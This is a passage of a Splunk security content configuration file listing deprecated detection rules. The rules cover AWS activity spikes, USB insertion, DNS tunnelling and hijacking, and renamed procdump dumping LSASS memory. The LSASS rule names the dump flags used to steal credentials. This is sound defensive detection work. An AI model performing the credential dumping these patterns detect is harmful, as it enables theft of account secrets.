search = `cloudtrail` eventType=AwsApiCall [search `cloudtrail` eventType=AwsApiCall | spath output=arn path=userIdentity.arn | stats count as apiCalls by arn | inputlookup api_call_by_user_baseline append=t | fields - latestCount | stats values(*) as * by arn | rename apiCalls as latestCount | eval newAvgApiCalls=avgApiCalls + (latestCount-avgApiCalls)/720 | eval newStdevApiCalls=sqrt(((pow(stdevApiCalls, 2)*719 + (latestCount-newAvgApiCalls)*(latestCount-avgApiCalls))/720)) | eval avgApiCalls=coalesce(newAvgApiCalls, avgApiCalls), stdevApiCalls=coalesce(newStdevApiCalls, stdevApiCalls), numDataPoints=if(isnull(latestCount), numDataPoints, numDataPoints+1) | table arn, latestCount, numDataPoints, avgApiCalls, stdevApiCalls | outputlookup api_call_by_user_baseline | eval dataPointThreshold = 15, deviationThreshold = 3 | eval isSpike=if((latestCount > avgApiCalls+deviationThreshold*stdevApiCalls) AND numDataPoints > dataPointThreshold, 1, 0) | where isSpike=1 | rename arn as userIdentity.arn | table userIdentity.arn] | spath output=user userIdentity.arn | stats values(eventName) as eventName, count as numberOfApiCalls, dc(eventName) as uniqueApisCalled by user | `detect_spike_in_aws_api_activity_filter`

[ESCU - Detect Spike in Network ACL Activity - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search will detect users creating spikes in API activity related to network access-control lists (ACLs) in your AWS environment. This search is deprecated and has been translated to use the latest Change datamodel.
action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.007"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search will detect users creating spikes in API activity related to network access-control lists (ACLs) in your AWS environment. This search is deprecated and has been translated to use the latest Change datamodel.
action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your AWS CloudTrail inputs. You can modify `dataPointThreshold` and `deviationThreshold` to better fit your environment. The `dataPointThreshold` variable is the minimum number of baseline data points required before a value can be judged a spike. The `deviationThreshold` variable is the number of standard deviations away from the mean that the value must be to be considered a spike. This search works best when you run the "Baseline of Network ACL Activity by ARN" support search once to create a lookup file of previously seen Network ACL Activity. To add or remove API event names related to network ACLs, edit the macro `network_acl_events`.
action.escu.known_false_positives = The false-positive rate may vary based on the values of `dataPointThreshold` and `deviationThreshold`. Please modify these according to your environment.
action.escu.creation_date = 2018-05-21
action.escu.modification_date = 2018-05-21
action.escu.confidence = high
action.escu.full_search_name = ESCU - Detect Spike in Network ACL Activity - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["AWS Network ACL Activity"]
action.risk = 1
action.risk.param._risk_message = tbd
action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Deprecated - Detect Spike in Network ACL Activity - Rule
action.correlationsearch.annotations = {"analytic_story": ["AWS Network ACL Activity"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.007"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` `network_acl_events` [search `cloudtrail` `network_acl_events` | spath output=arn path=userIdentity.arn | stats count as apiCalls by arn | inputlookup network_acl_activity_baseline append=t | fields - latestCount | stats values(*) as * by arn | rename apiCalls as latestCount | eval newAvgApiCalls=avgApiCalls + (latestCount-avgApiCalls)/720 | eval newStdevApiCalls=sqrt(((pow(stdevApiCalls, 2)*719 + (latestCount-newAvgApiCalls)*(latestCount-avgApiCalls))/720)) | eval avgApiCalls=coalesce(newAvgApiCalls, avgApiCalls), stdevApiCalls=coalesce(newStdevApiCalls, stdevApiCalls), numDataPoints=if(isnull(latestCount), numDataPoints, numDataPoints+1) | table arn, latestCount, numDataPoints, avgApiCalls, stdevApiCalls | outputlookup network_acl_activity_baseline | eval dataPointThreshold = 15, deviationThreshold = 3 | eval isSpike=if((latestCount > avgApiCalls+deviationThreshold*stdevApiCalls) AND numDataPoints > dataPointThreshold, 1, 0) | where isSpike=1 | rename arn as userIdentity.arn | table userIdentity.arn] | spath output=user userIdentity.arn | stats values(eventName) as eventNames, count as numberOfApiCalls, dc(eventName) as uniqueApisCalled by user | `detect_spike_in_network_acl_activity_filter`

[ESCU - Detect Spike in Security Group Activity - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search will detect users creating spikes in API activity related to security groups in your AWS environment. It will also update the cache file that factors in the latest data. This search is deprecated and has been translated to use the latest Change Datamodel.
action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search will detect users creating spikes in API activity related to security groups in your AWS environment. It will also update the cache file that factors in the latest data. This search is deprecated and has been translated to use the latest Change Datamodel.
action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your AWS CloudTrail inputs. You can modify `dataPointThreshold` and `deviationThreshold` to better fit your environment. The `dataPointThreshold` variable is the minimum number of data points required to have a statistically significant amount of data to determine. The `deviationThreshold` variable is the number of standard deviations away from the mean that the value must be to be considered a spike. This search works best when you run the "Baseline of Security Group Activity by ARN" support search once to create a history of previously seen Security Group Activity. To add or remove API event names for security groups, edit the macro `security_group_api_calls`.
action.escu.known_false_positives = Based on the values of `dataPointThreshold` and `deviationThreshold`, the false positive rate may vary. Please modify this according to your environment.
action.escu.creation_date = 2018-04-18
action.escu.modification_date = 2018-04-18
action.escu.confidence = high
action.escu.full_search_name = ESCU - Detect Spike in Security Group Activity - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["AWS User Monitoring"]
action.risk = 1
action.risk.param._risk_message = tbd
action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Deprecated - Detect Spike in Security Group Activity - Rule
action.correlationsearch.annotations = {"analytic_story": ["AWS User Monitoring"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` `security_group_api_calls` [search `cloudtrail` `security_group_api_calls` | spath output=arn path=userIdentity.arn | stats count as apiCalls by arn | inputlookup security_group_activity_baseline append=t | fields - latestCount | stats values(*) as * by arn | rename apiCalls as latestCount | eval newAvgApiCalls=avgApiCalls + (latestCount-avgApiCalls)/720 | eval newStdevApiCalls=sqrt(((pow(stdevApiCalls, 2)*719 + (latestCount-newAvgApiCalls)*(latestCount-avgApiCalls))/720)) | eval avgApiCalls=coalesce(newAvgApiCalls, avgApiCalls), stdevApiCalls=coalesce(newStdevApiCalls, stdevApiCalls), numDataPoints=if(isnull(latestCount), numDataPoints, numDataPoints+1) | table arn, latestCount, numDataPoints, avgApiCalls, stdevApiCalls | outputlookup security_group_activity_baseline | eval dataPointThreshold = 15, deviationThreshold = 3 | eval isSpike=if((latestCount > avgApiCalls+deviationThreshold*stdevApiCalls) AND numDataPoints > dataPointThreshold, 1, 0) | where isSpike=1 | rename arn as userIdentity.arn | table userIdentity.arn] | spath output=user userIdentity.arn | stats values(eventName) as eventNames, count as numberOfApiCalls, dc(eventName) as uniqueApisCalled by user | `detect_spike_in_security_group_activity_filter`

[ESCU - Detect USB device insertion - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. The search is used to detect hosts that generate Windows Event ID 4663 for successful attempts to write to or read from a removable storage and Event ID 4656 for failures, which occurs when a USB drive is plugged in. In this scenario we are querying the Change_Analysis data model to look for Windows Event ID 4656 or 4663 where the priority of the affected host is marked as high in the ES Assets and Identity Framework.
action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.CM"]}
action.escu.data_models = ["Change", "Change_Analysis"]
action.escu.eli5 = The search is used to detect hosts that generate Windows Event ID 4663 for successful attempts to write to or read from a removable storage and Event ID 4656 for failures, which occurs when a USB drive is plugged in. In this scenario we are querying the Change_Analysis data model to look for Windows Event ID 4656 or 4663 where the priority of the affected host is marked as high in the ES Assets and Identity Framework.
action.escu.how_to_implement = To successfully implement this search, you must ingest Windows Security Event logs and track event code 4663 and 4656. Ensure that the field from the event logs is being mapped to the result_id field in the Change_Analysis data model. To minimize the alert volume, this search leverages the Assets and Identity framework to filter out events from those assets not marked high priority in the Enterprise Security Assets and Identity Framework.
action.escu.known_false_positives = Legitimate USB activity will also be detected. Please verify and investigate as appropriate.
action.escu.creation_date = 2017-11-27
action.escu.modification_date = 2017-11-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Detect USB device insertion - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Data Protection"]
action.risk = 1
action.risk.param._risk_message = tbd
action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Deprecated - Detect USB device insertion - Rule
action.correlationsearch.annotations = {"analytic_story": ["Data Protection"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The search is used to detect hosts that generate Windows Event ID 4663 for successful attempts to write to or read from a removable storage and Event ID 4656 for failures, which occurs when a USB drive is plugged in. In this scenario we are querying the Change_Analysis data model to look for Windows Event ID 4656 or 4663 where the priority of the affected host is marked as high in the ES Assets and Identity Framework.
action.notable.param.rule_title = Detect USB device insertion
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count earliest(_time) AS earliest latest(_time) AS latest from datamodel=Change_Analysis where (nodename = All_Changes) All_Changes.result="Removable Storage device" (All_Changes.result_id=4663 OR All_Changes.result_id=4656) (All_Changes.src_priority=high) by All_Changes.dest | `drop_dm_object_name("All_Changes")`| `security_content_ctime(earliest)`| `security_content_ctime(latest)` | `detect_usb_device_insertion_filter`

[ESCU - Detect web traffic to dynamic domain providers - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for web connections to dynamic DNS providers.
action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1071.001"], "nist": ["DE.CM"]}
action.escu.data_models = ["Web"]
action.escu.eli5 = This search looks for web connections to dynamic DNS providers.
action.escu.how_to_implement = This search requires you to be ingesting web-traffic logs. You can obtain these logs from indexing data from a web proxy or by using a network-traffic-analysis tool, such as Bro or Splunk Stream. The web data model must contain the URL being requested, the IP address of the host initiating the request, and the destination IP. This search also leverages a lookup file, `dynamic_dns_providers_default.csv`, which contains a non-exhaustive list of dynamic DNS providers. Consider periodically updating this local lookup file with new domains.\
This search produces fields (`isDynDNS`) that are not yet supported by ES Incident Review and therefore cannot be viewed when a notable event is raised. These fields contribute additional context to the notable. To see the additional metadata, add the following fields, if not already present, to Incident Review - Event Attributes (Configure > Incident Management > Incident Review Settings > Add New Entry):\\n1. **Label:** IsDynamicDNS, **Field:** isDynDNS\
Detailed documentation on how to create a new field within Incident Review may be found here: `https://docs.splunk.com/Documentation/ES/5.3.0/Admin/Customizenotables#Add_a_field_to_the_notable_event_details` Deprecated because duplicate.
action.escu.known_false_positives = It is possible that the list of dynamic DNS providers is outdated and/or that the URL being requested is legitimate.
action.escu.creation_date = 2020-07-21
action.escu.modification_date = 2020-07-21
action.escu.confidence = high
action.escu.full_search_name = ESCU - Detect web traffic to dynamic domain providers - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Dynamic DNS"]
action.risk = 1
action.risk.param._risk_message = tbd
action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Deprecated - Detect web traffic to dynamic domain providers - Rule
action.correlationsearch.annotations = {"analytic_story": ["Dynamic DNS"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1071.001"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search looks for web connections to dynamic DNS providers.
action.notable.param.rule_title = Detect web traffic to dynamic domain providers
action.notable.param.security_domain = network
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count values(Web.url) as url min(_time) as firstTime from datamodel=Web where Web.status=200 by Web.src Web.dest Web.status | `drop_dm_object_name("Web")` | `security_content_ctime(firstTime)` | `dynamic_dns_web_traffic` | `detect_web_traffic_to_dynamic_domain_providers_filter`

[ESCU - Detection of DNS Tunnels - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search is used to detect DNS tunneling by calculating the sum of the length of DNS queries and DNS answers. The search also filters out potential false positives by filtering out queries made to internal systems and the queries originating from internal DNS, Web, and Email servers. Endpoints using DNS as a method of transmission for data exfiltration, Command And Control, or evasion of security controls can often be detected by noting an unusually large volume of DNS traffic. \
NOTE: Deprecated because an existing detection does the same. This detection is replaced with two other variations: if you are using MLTK, you can use the search `ESCU - DNS Query Length Outliers - MLTK - Rule`, or use the standard deviation version `ESCU - DNS Query Length With High Standard Deviation - Rule` as an alternative.
action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1048.003"], "nist": ["DE.CM"]}
action.escu.data_models = ["Network_Resolution"]
action.escu.eli5 = This search is used to detect DNS tunneling by calculating the sum of the length of DNS queries and DNS answers. The search also filters out potential false positives by filtering out queries made to internal systems and the queries originating from internal DNS, Web, and Email servers. Endpoints using DNS as a method of transmission for data exfiltration, Command And Control, or evasion of security controls can often be detected by noting an unusually large volume of DNS traffic. \
NOTE: Deprecated because an existing detection does the same. This detection is replaced with two other variations: if you are using MLTK, you can use the search `ESCU - DNS Query Length Outliers - MLTK - Rule`, or use the standard deviation version `ESCU - DNS Query Length With High Standard Deviation - Rule` as an alternative.
action.escu.how_to_implement = To successfully implement this search, we must ensure that DNS data is being ingested and mapped to the appropriate fields in the Network_Resolution data model. Fields like src_category are automatically provided by the Assets and Identity Framework shipped with Splunk Enterprise Security. You will need to ensure you are using the Assets and Identity Framework and populating the src_category field. You will also need to enable the `cim_corporate_web_domain_search()` macro, which filters out the DNS queries made to the corporate web domains to reduce alert fatigue.
action.escu.known_false_positives = It's possible that normal DNS traffic will exhibit this behavior. If an alert is generated, please investigate and validate as appropriate. The threshold can also be modified to better suit your environment.
action.escu.creation_date = 2022-02-15
action.escu.modification_date = 2022-02-15
action.escu.confidence = high
action.escu.full_search_name = ESCU - Detection of DNS Tunnels - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Data Protection", "Suspicious DNS Traffic", "Command And Control"]
action.risk = 1
action.risk.param._risk_message = tbd
action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Deprecated - Detection of DNS Tunnels - Rule
action.correlationsearch.annotations = {"analytic_story": ["Data Protection", "Suspicious DNS Traffic", "Command And Control"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1048.003"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search is used to detect DNS tunneling by calculating the sum of the length of DNS queries and DNS answers. The search also filters out potential false positives by filtering out queries made to internal systems and the queries originating from internal DNS, Web, and Email servers. Endpoints using DNS as a method of transmission for data exfiltration, Command And Control, or evasion of security controls can often be detected by noting an unusually large volume of DNS traffic. \
NOTE: Deprecated because an existing detection does the same. This detection is replaced with two other variations: if you are using MLTK, you can use the search `ESCU - DNS Query Length Outliers - MLTK - Rule`, or use the standard deviation version `ESCU - DNS Query Length With High Standard Deviation - Rule` as an alternative.
action.notable.param.rule_title = Detection of DNS Tunnels
action.notable.param.security_domain = network
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` dc("DNS.query") as count from datamodel=Network_Resolution where nodename=DNS "DNS.message_type"="QUERY" NOT (`cim_corporate_web_domain_search("DNS.query")`) NOT "DNS.query"="*.in-addr.arpa" NOT ("DNS.src_category"="svc_infra_dns" OR "DNS.src_category"="svc_infra_webproxy" OR "DNS.src_category"="svc_infra_email*" ) by "DNS.src","DNS.query" | rename "DNS.src" as src "DNS.query" as message | eval length=len(message) | stats sum(length) as length by src | append [ tstats `security_content_summariesonly` dc("DNS.answer") as count from datamodel=Network_Resolution where nodename=DNS "DNS.message_type"="QUERY" NOT (`cim_corporate_web_domain_search("DNS.query")`) NOT "DNS.query"="*.in-addr.arpa" NOT ("DNS.src_category"="svc_infra_dns" OR "DNS.src_category"="svc_infra_webproxy" OR "DNS.src_category"="svc_infra_email*" ) by "DNS.src","DNS.answer" | rename "DNS.src" as src "DNS.answer" as message | eval message=if(message=="unknown","", message) | eval length=len(message) | stats sum(length) as length by src ] | stats sum(length) as length by src | where length > 10000 | `detection_of_dns_tunnels_filter`

[ESCU - DNS Query Requests Resolved by Unauthorized DNS Servers - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search will detect DNS requests resolved by unauthorized DNS servers. Legitimate DNS servers should be identified in the Enterprise Security Assets and Identity Framework.
action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1071.004"], "nist": ["DE.CM"]}
action.escu.data_models = ["Network_Resolution"]
action.escu.eli5 = This search will detect DNS requests resolved by unauthorized DNS servers. Legitimate DNS servers should be identified in the Enterprise Security Assets and Identity Framework.
action.escu.how_to_implement = To successfully implement this search you will need to ensure that DNS data is populating the Network_Resolution data model. It also requires that your DNS servers are identified correctly in the Assets and Identity table of Enterprise Security.
action.escu.known_false_positives = Legitimate DNS activity can be detected in this search. Investigate, verify and update the list of authorized DNS servers as appropriate.
action.escu.creation_date = 2020-07-21
action.escu.modification_date = 2020-07-21
action.escu.confidence = high
action.escu.full_search_name = ESCU - DNS Query Requests Resolved by Unauthorized DNS Servers - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["DNS Hijacking", "Suspicious DNS Traffic", "Host Redirection", "Command And Control"]
action.risk = 1
action.risk.param._risk_message = tbd
action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Deprecated - DNS Query Requests Resolved by Unauthorized DNS Servers - Rule
action.correlationsearch.annotations = {"analytic_story": ["DNS Hijacking", "Suspicious DNS Traffic", "Host Redirection", "Command And Control"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1071.004"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search will detect DNS requests resolved by unauthorized DNS servers. Legitimate DNS servers should be identified in the Enterprise Security Assets and Identity Framework.
action.notable.param.rule_title = DNS Query Requests Resolved by Unauthorized DNS Servers
action.notable.param.security_domain = network
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count from datamodel=Network_Resolution where DNS.dest_category != dns_server AND DNS.src_category != dns_server by DNS.src DNS.dest | `drop_dm_object_name("DNS")` | `dns_query_requests_resolved_by_unauthorized_dns_servers_filter`

[ESCU - DNS record changed - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. The search takes the DNS records and their answers from the discovered_dns_records lookup and finds whether any records have changed by searching DNS responses in the Network_Resolution datamodel across the last day.
action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1071.004"], "nist": ["DE.CM"]}
action.escu.data_models = ["Network_Resolution"]
action.escu.eli5 = The search takes the DNS records and their answers from the discovered_dns_records lookup and finds whether any records have changed by searching DNS responses in the Network_Resolution datamodel across the last day.
action.escu.how_to_implement = To successfully implement this search you will need to ensure that DNS data is populating the `Network_Resolution` data model. It also requires that the `discover_dns_record` lookup table be populated by the included support search "Discover DNS record". \
**Splunk>Phantom Playbook Integration**\
If Splunk>Phantom is also configured in your environment, a Playbook called "DNS Hijack Enrichment" can be configured to run when any results are found by this detection search. The playbook takes in the DNS record changed and uses Geoip, whois, Censys and PassiveTotal to detect if DNS issuers changed. To use this integration, install the Phantom App for Splunk `https://splunkbase.splunk.com/app/3411/`, add the correct hostname to the "Phantom Instance" field in the Adaptive Response Actions when configuring this detection search, and set the corresponding Playbook to active. \
(Playbook Link:`https://my.phantom.us/4.2/playbook/dns-hijack-enrichment/`).\
action.escu.known_false_positives = Legitimate DNS changes can be detected in this search. Investigate, verify and update the list of provided current answers for the domains in question as appropriate.
action.escu.creation_date = 2020-07-21
action.escu.modification_date = 2020-07-21
action.escu.confidence = high
action.escu.full_search_name = ESCU - DNS record changed - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["DNS Hijacking"]
action.risk = 1
action.risk.param._risk_message = tbd
action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Deprecated - DNS record changed - Rule
action.correlationsearch.annotations = {"analytic_story": ["DNS Hijacking"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1071.004"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The search takes the DNS records and their answers from the discovered_dns_records lookup and finds whether any records have changed by searching DNS responses in the Network_Resolution datamodel across the last day.
action.notable.param.rule_title = DNS record changed
action.notable.param.security_domain = network
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | inputlookup discovered_dns_records | rename answer as discovered_answer | join domain[|tstats `security_content_summariesonly` count values(DNS.record_type) as type, values(DNS.answer) as current_answer values(DNS.src) as src from datamodel=Network_Resolution where DNS.message_type=RESPONSE DNS.answer!="unknown" DNS.answer!="" by DNS.query | rename DNS.query as query | where query!="unknown" | rex field=query "(?<domain>\w+\.\w+?)(?:$|/)"] | makemv delim=" " answer | makemv delim=" " type | sort -count | table count,src,domain,type,query,current_answer,discovered_answer | makemv current_answer | mvexpand current_answer | makemv discovered_answer | eval n=mvfind(discovered_answer, current_answer) | where isnull(n) | `dns_record_changed_filter`

[ESCU - Dump LSASS via procdump Rename - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. Detect a renamed instance of procdump.exe dumping the lsass process. This query looks for both -mm and -ma usage. -mm will produce a mini dump file and -ma will write a dump file with all process memory. Both are highly suspect and should be reviewed. Modify the query as needed.\
During triage, confirm this is procdump.exe executing. If it is the first time a Sysinternals utility has been run, it is possible there will be a -accepteula on the command line. Review other endpoint data sources for cross process (injection) into lsass.exe.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.001"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = Detect a renamed instance of procdump.exe dumping the lsass process. This query looks for both -mm and -ma usage. -mm will produce a mini dump file and -ma will write a dump file with all process memory. Both are highly suspect and should be reviewed. Modify the query as needed.\
During triage, confirm this is procdump.exe executing. If it is the first time a Sysinternals utility has been run, it is possible there will be a -accepteula on the command line. Review other endpoint data sources for cross process (injection) into lsass.exe.
action.escu.how_to_implement = To successfully implement this search you need to be ingesting information on processes, including the name of the process responsible for the changes, from your endpoints into the `Endpoint` datamodel in the `Processes` node.
action.escu.known_false_positives = None identified.
action.escu.creation_date = 2021-02-01
action.escu.modification_date = 2021-02-01
action.escu.confidence = high
action.escu.full_search_name = ESCU - Dump LSASS via procdump Rename - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Sysmon"]
action.escu.analytic_story = ["Credential Dumping", "HAFNIUM Group", "CISA AA22-257A"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Deprecated - Dump LSASS via procdump Rename - Rule
action.correlationsearch.annotations = {"analytic_story": ["Credential Dumping", "HAFNIUM Group", "CISA AA22-257A"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.001"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `sysmon` OriginalFileName=procdump process_name!=procdump*.exe EventID=1 (CommandLine=*-ma* OR CommandLine=*-mm*) CommandLine=*lsass* | stats count min(_time) as firstTime max(_time) as lastTime by dest, parent_process_name, process_name, OriginalFileName, CommandLine | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `dump_lsass_via_procdump_rename_filter`

[ESCU - EC2 Instance Modified With Previously Unseen User - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for EC2 instances being modified by users who have not previously modified them. \
This search is deprecated and has been translated to use the latest Change data model.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004"], "nist": ["DE.AE"]}
action.escu.data_models = []
